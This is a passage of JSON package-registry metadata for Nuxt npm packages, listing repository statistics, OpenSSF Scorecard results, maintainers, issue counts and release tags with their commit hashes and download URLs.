@nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32596531,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-03T22:12:39.696Z","status":"online","status_checked_at":"2026-05-04T02:00:06.625Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-05-11T01:23:03.054Z","dependent_packages_count":1,"downloads":3994,"downloads_period":"last-month","dependent_repos_count":2,"rankings":{"downloads":2.1926308122875655,"dependent_repos_count":7.613224151458317,"dependent_packages_count":20.911788993680194,"stargazers_count":0.15564167441745766,"forks_count":0.5232519525968256,"docker_downloads_count":null,"average":6.279307516888072},"purl":"pkg:npm/%40nuxt/types-edge","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/types-edge","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/types-edge","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/types-edge/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-08T05:00:23.926Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786911.0872727273,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":589,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.4957762889600934,"merged_pull_requests_count":5385,"bot_issues_count":12,"bot_pull_requests_count":2971,"past_year_issues_count":838,"past_year_pull_requests_count":1377,"past_year_avg_time_to_close_issue":720221.4700665189,"past_year_avg_time_to_close_pull_request":229718.65300285988,"past_year_issues_closed_count":451,"past_year_pull_requests_closed_count":1049,"past_year_pull_request_authors_count":127,"past_year_issue_authors_count":605,"past_year_avg_comments_per_issue":2.2386634844868736,"past_year_avg_comments_per_pull_request":3.3209876543209877,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":551,"past_year_merged_pull_requests_count":932,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":59,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":42,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"cernymatej","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"BobbieGoede","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"DamianGlowala","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"wattanx","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"antfu","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"HugoRCD","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Ftypes-edge/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Ftypes-edge/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Ftypes-edge/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Ftypes-edge/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Ftypes-edge/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Ftypes-edge/codemeta","maintainers":[{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2026-02-13T18:02:50.817Z","updated_at":"2026-02-13T18:02:50.817Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-11-12T00:43:40.216Z","updated_at":"2023-11-12T00:43:40.216Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096082,"name":"@nuxt/config","ecosystem":"npm","description":null,"homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":67,"first_release_published_at":"2018-11-16T14:16:25.764Z","latest_release_published_at":"2024-06-28T11:34:19.201Z","latest_release_number":"2.18.1","last_synced_at":"2026-05-11T01:23:11.715Z","created_at":"2022-04-08T10:39:22.188Z","updated_at":"2026-05-11T01:23:11.715Z","registry_url":"https://www.npmjs.com/package/@nuxt/config","install_command":"npm install @nuxt/config","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"2x":"2.16.2","latest":"2.18.1"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Intuitive Vue Framework.","archived":false,"fork":false,"pushed_at":"2024-10-29T20:55:49.000Z","size":114898,"stargazers_count":54703,"open_issues_count":872,"forks_count":5004,"subscribers_count":793,"default_branch":"main","last_synced_at":"2024-10-29T21:25:05.500Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.config.json","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["nuxt"],"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2024-10-29T18:14:58.000Z","dependencies_parsed_at":"2023-12-19T04:00:01.692Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":5138,"total_committers":630,"mean_commits":8.155555555555555,"dds":0.6897625535227715,"last_synced_commit":"800902df129a13e0da40b04b3a09e0d1a9852820"},"previous_names":["nuxt/nuxt.js"],"tags_count":223,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222121833,"owners_count":16934971,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":61,"last_synced_at":"2024-05-20T15:02:00.816Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":99051,"followers":3259,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2024-05-20T15:02:03.446Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2